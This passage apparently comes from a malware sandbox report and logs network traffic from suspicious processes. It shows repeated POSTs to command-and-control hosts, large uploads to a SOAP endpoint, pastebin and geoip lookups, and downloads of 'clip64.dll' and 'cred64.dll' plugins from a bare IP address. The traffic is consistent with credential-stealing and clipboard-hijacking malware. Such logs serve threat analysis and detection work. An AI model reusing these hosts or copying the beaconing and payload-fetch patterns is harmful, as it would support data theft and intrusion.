Content-Length: 257
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:41:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ufnsqcmkq.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 120
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:41:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://pgebka.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 152
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:41:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://oalsmbti.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 369
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:41:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jaqjg.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 204
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:41:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://85.209.176.171/

43A5.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 85.209.176.171
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 00:45:42 GMT
POST

http://85.209.176.171/

43A5.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 85.209.176.171
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 00:45:42 GMT
POST

http://85.209.176.171/

43A5.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 85.209.176.171
Content-Length: 799481
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 147
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 00:45:42 GMT
POST

http://85.209.176.171/

43A5.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 85.209.176.171
Content-Length: 799473
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 Oct 2023 00:45:42 GMT
DNS

171.176.209.85.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.176.209.85.in-addr.arpa

IN PTR

Response
DNS

pastebin.com

423C.exe

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

104.20.68.143

pastebin.com

IN A

104.20.67.143

pastebin.com

IN A

172.67.34.170
GET

https://pastebin.com/raw/8baCJyMF

423C.exe

Remote address:

104.20.68.143:443

Request

GET /raw/8baCJyMF HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:16 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 1003
Last-Modified: Tue, 10 Oct 2023 20:24:33 GMT
Server: cloudflare
CF-RAY: 8141aee85a910e9c-AMS
DNS

143.68.20.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

143.68.20.104.in-addr.arpa

IN PTR

Response
DNS

143.68.20.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

143.68.20.104.in-addr.arpa

IN PTR

Response
DNS

tak.soydet.top

423C.exe

Remote address:

8.8.8.8:53

Request

tak.soydet.top

IN A

Response

tak.soydet.top

IN A

95.217.246.182
DNS

tak.soydet.top

423C.exe

Remote address:

8.8.8.8:53

Request

tak.soydet.top

IN A

Response

tak.soydet.top

IN A

95.217.246.182
DNS

bytecloudasa.website

RegSvcs.exe

Remote address:

8.8.8.8:53

Request

bytecloudasa.website

IN A

Response

bytecloudasa.website

IN A

172.67.212.39

bytecloudasa.website

IN A

104.21.61.162
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 8
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cZ4xBdJM4Okt2jmqcILJIgvkfVmP8Bv2HEwj7oxftm1EzoNnfBMS5ikRMNo6XIWUciSm8JAdTyRmtN8BhkWINZz6fwg%2FOl6K7EdL%2Bxv545YXDANXqkdG4DHK1kRthlXKsvu1o8JSqA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141aef43f856690-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=t9hj7utmvvpts99qvjm7aod7i6; expires=Sat, 03 Feb 2024 14:28:05 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:26 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BnZ%2F2oFKaAqeMGId%2FoDQbKBO7n2FvnktDhc3Kt%2FGbRhIVTsmTbTNedTWxyZTfZwATFi7%2BLbqzT6yc2kPIMlkdUH90Dgh03FfoeZjHA2NruJFo2eKFLnzAyNYfUyFKdLiM1IbXJN0wQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141af24da9e6690-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: bytecloudasa.website
Content-Length: 56
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=uetagrfo1pscjfv6482jj300vl; expires=Sat, 03 Feb 2024 14:28:02 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:23 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ied%2BnhvIePY9PMwNzuYD%2BowG81w99RJrruu0hq5Yb4hVsdOJTPNrKYWCGS6eemPbcrfUlP473ZBJVTbsZEt2aa6YUvzTOL8EYhMNbcophZcXKloHnD0kQELQfvIRvaU3NTYEq5JWsw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141aef59efa66dc-AMS
DNS

182.246.217.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

182.246.217.95.in-addr.arpa

IN PTR

Response

182.246.217.95.in-addr.arpa

IN PTR

static18224621795clientsyour-serverde
DNS

182.246.217.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

182.246.217.95.in-addr.arpa

IN PTR

Response

182.246.217.95.in-addr.arpa

IN PTR

static18224621795clientsyour-serverde
DNS

39.212.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

39.212.67.172.in-addr.arpa

IN PTR

Response
DNS

39.212.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

39.212.67.172.in-addr.arpa

IN PTR

Response
DNS

api.ip.sb

43A5.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31
GET

https://api.ip.sb/geoip

43A5.exe

Remote address:

172.67.75.172:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:21 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
vary: Accept-Encoding
vary: Accept-Encoding
Cache-Control: no-cache
access-control-allow-origin: *
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0eRAurAo%2BNF5VtfSNRxJ2wNNm0U%2BMPBW9OGb4jL3ocH%2FChY3Axn%2BQnESactrTTMAgfabCdh2iExjkOmJCPmMyNn5F9j8aX4UkpU5MVgX5j4oJhDehwwfYUKbBw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 8141af055a75d0cd-AMS
alt-svc: h3=":443"; ma=86400
DNS

172.75.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.75.67.172.in-addr.arpa

IN PTR

Response
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=dkpvspa744p9r3q0eftk0nlhq4; expires=Sat, 03 Feb 2024 14:28:07 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:28 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vk6yUDv9gnJiC24nyJR8jGcPp%2BrsEfyBkpVN41C8m%2F3dHT7u3EEi8rAIf6LBWycmkpmzufoSZ5rheQ6g8Vcvc%2Fl%2B4UHpQSqmtaBVdfbTce9F%2BjGi4bA1KH7GIT6wl9wdNjnRvoEB%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141af286d390e37-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=bjqh356b7mtusmgpdd7us5cku3; expires=Sat, 03 Feb 2024 14:28:07 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:28 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sd5Q8Cn5Q6ienUDILhI5wjlhUfO2NzdoQFFVDgAiQjPnKqOxxHi4ENVyS8vgyte6MQSyTF%2FATvQGKsho%2F8EB3FCusTwipQ%2BCa9IEa%2FNir%2FrMBBIRX%2BhYrdEBVtaAhXciuYSUic2L3A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141af335d0966ba-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=i55vfpaaj3c8bnr482il2egh10; expires=Sat, 03 Feb 2024 14:28:08 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:45 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QdxDOTxU%2Fal96bZOZ6pkPuWfKiPq9XcDqEiaezBLmxdarLFPwaWS9nszlSQp2iIzHY5%2BCUqmJn5F4JASD0CmySfRy%2FvW%2BBJU4UJHPLlwJT%2F68Vnu%2Fmexlpw1QVtvyQ2wdAgtx40TTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141af345edc0b60-AMS
GET

http://77.91.124.1/theme/Plugins/cred64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/cred64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 20:41:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
GET

http://77.91.124.1/theme/Plugins/clip64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/clip64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 30 Sep 2023 10:50:50 GMT
ETag: "16400-60691507c5cc0"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
DNS

host-file-host6.com

Remote address:

8.8.8.8:53

Request

host-file-host6.com

IN A

Response
DNS

host-host-file8.com

Remote address:

8.8.8.8:53

Request

host-host-file8.com

IN A

Response

host-host-file8.com

IN A

194.169.175.127
POST

http://host-host-file8.com/

Explorer.EXE

Remote address:

194.169.175.127:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dfebt.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 292
Host: host-host-file8.com

Response

HTTP/1.1 200 OK

Server: nginx/1.20.2
Date: Tue, 10 Oct 2023 20:41:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
DNS

bytecloudasa.website

RegSvcs.exe

Remote address:

8.8.8.8:53

Request

bytecloudasa.website

IN A

Response

bytecloudasa.website

IN A

172.67.212.39

bytecloudasa.website

IN A

104.21.61.162
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ik7q596mj1trg6bq3dsar3bict; expires=Sat, 03 Feb 2024 14:28:26 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:47 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sSvfsgfJsr3qJqpRcNvElPYiIoAfalxzEgfYsCs2aF2W6mPYmJHrQBz3VTPUteLH1Z6IsHj%2ByU861mCzQffg6TAog4nZolEZNBZ4GEOhSaj5AxUqYrCVS6XP5hdPyTthSk6jAa3deA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141af9f89ef0a6c-AMS
DNS

127.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.175.169.194.in-addr.arpa

IN PTR

Response
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=bpvm29mtssqmu7dh4ni9fberct; expires=Sat, 03 Feb 2024 14:28:27 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:48 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NAOcMbH7dOFUG9E9fi6BAlIpZNLPiOd%2BkViGudsg6JRggLCi4zYUFSMsBVNles6ZPju6eoDLWG4weilvihrkh0FSXkJI%2Bz92mh%2B%2BazXEs8NAdkDyPb7LPABTaWYDxhmf%2FePJCy93Pw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141afa97f7a66aa-AMS
DNS

50ca6d47-81f2-4487-90e1-3a96370ad5b4.uuid.cdntokiog.studio

csrss.exe

Remote address:

8.8.8.8:53

Request

50ca6d47-81f2-4487-90e1-3a96370ad5b4.uuid.cdntokiog.studio

IN TXT

Response
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=q0ca9qtdsv57o7odd3k0vau92r; expires=Sat, 03 Feb 2024 14:28:28 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:49 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5dHwLsNcxSLjXdgA86G%2FrJYklZxfUPTYf5%2FL8sdg7MQKplLnhcVnsbzPLG0yYEfpY4oXLQ4Di9I5GFSwWeYBCzFWNXfEB%2BwKKdVVVAx3LO4PmaVAzrTI2y9l8zqIKOUX5OqyrasBdw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141afb3eb8866a4-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=16pvhtkd5osu546uk422jnahnu; expires=Sat, 03 Feb 2024 14:28:28 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:49 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
